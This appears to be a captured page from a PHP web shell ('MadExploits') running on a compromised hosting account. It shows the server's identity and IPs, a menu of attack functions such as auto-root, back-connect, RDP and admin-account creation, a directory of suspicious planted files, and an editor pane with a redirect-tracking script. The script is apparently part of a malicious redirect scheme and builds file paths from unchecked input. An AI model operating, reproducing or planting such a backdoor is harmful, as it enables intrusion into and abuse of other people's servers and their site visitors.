Linux musi.iixcp.rumahweb.net 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
LiteSpeed
: 103.247.9.165 | : 216.73.216.132
Cant Read [ /etc/named.conf ]
7.4.33
pliq4844
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
pliq4844 /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
1cc9bfc7
[ DIR ]
drwxr-xr-x
7Mmcksh8SV
[ DIR ]
drwxr-xr-x
9cda3400
[ DIR ]
drwxr-xr-x
O8VNsvWljF
[ DIR ]
drwxr-xr-x
dSQvzbvdjz
[ DIR ]
drwxr-xr-x
log
[ DIR ]
drwxr-xr-x
mFZksHDFDR
[ DIR ]
drwxr-xr-x
temp
[ DIR ]
drwxr-xr-x
to7yYVenxN
[ DIR ]
drwxr-xr-x
.htaccess
259
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
bibili2.php
440
B
-r--r--r--
class.api.php
6.35
KB
-rw-r--r--
error_log
220.22
KB
-rw-r--r--
favicon.png
1.31
KB
-rw-r--r--
fqspw.php
108
B
-rw-r--r--
google5275d6b743551553.html
53
B
-rw-r--r--
google71d26532a9a79f7f.html
53
B
-rw-r--r--
lock360.php
6.71
KB
-rw-r--r--
merhababenmari.txt
38
B
-rw-r--r--
old_index.php
1.01
MB
-rw-r--r--
samurai_activity.log
420
B
-rw-r--r--
sys.txt
93
B
-rw-r--r--
test.txt
14
B
-rw-r--r--
update_stats.php
2.13
KB
-rw-r--r--
verime.php
32.07
KB
-rw-r--r--
web.config
2.33
KB
-rw-r--r--
webconfig.php
1.17
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : update_stats.php
<?php header('Content-Type: application/json'); header('Access-Control-Allow-Origin: *'); header('Access-Control-Allow-Methods: POST'); header('Access-Control-Allow-Headers: Content-Type'); if ($_SERVER['REQUEST_METHOD'] === 'POST') { $input = json_decode(file_get_contents('php://input'), true); $redirect_id = $input['redirect_id'] ?? ''; $action = $input['action'] ?? ''; if ($redirect_id && $action) { $stats_file = $redirect_id . '_stats.json'; if (file_exists($stats_file)) { $stats = json_decode(file_get_contents($stats_file), true); $current_date = date('Y-m-d'); $current_hour = date('H'); if ($action === 'visit') { $stats['total_visits']++; if (!isset($stats['daily_stats'][$current_date])) { $stats['daily_stats'][$current_date] = ['visits' => 0, 'redirects' => 0]; } $stats['daily_stats'][$current_date]['visits']++; $hour_key = $current_date . '_' . $current_hour; if (!isset($stats['hourly_stats'][$hour_key])) { $stats['hourly_stats'][$hour_key] = ['visits' => 0, 'redirects' => 0]; } $stats['hourly_stats'][$hour_key]['visits']++; } elseif ($action === 'redirect') { $stats['redirects']++; if (!isset($stats['daily_stats'][$current_date])) { $stats['daily_stats'][$current_date] = ['visits' => 0, 'redirects' => 0]; } $stats['daily_stats'][$current_date]['redirects']++; $hour_key = $current_date . '_' . $current_hour; if (!isset($stats['hourly_stats'][$hour_key])) { $stats['hourly_stats'][$hour_key] = ['visits' => 0, 'redirects' => 0]; } $stats['hourly_stats'][$hour_key]['redirects']++; } file_put_contents($stats_file, json_encode($stats, JSON_PRETTY_PRINT), LOCK_EX); echo json_encode(['status' => 'success']); } } } ?>
Close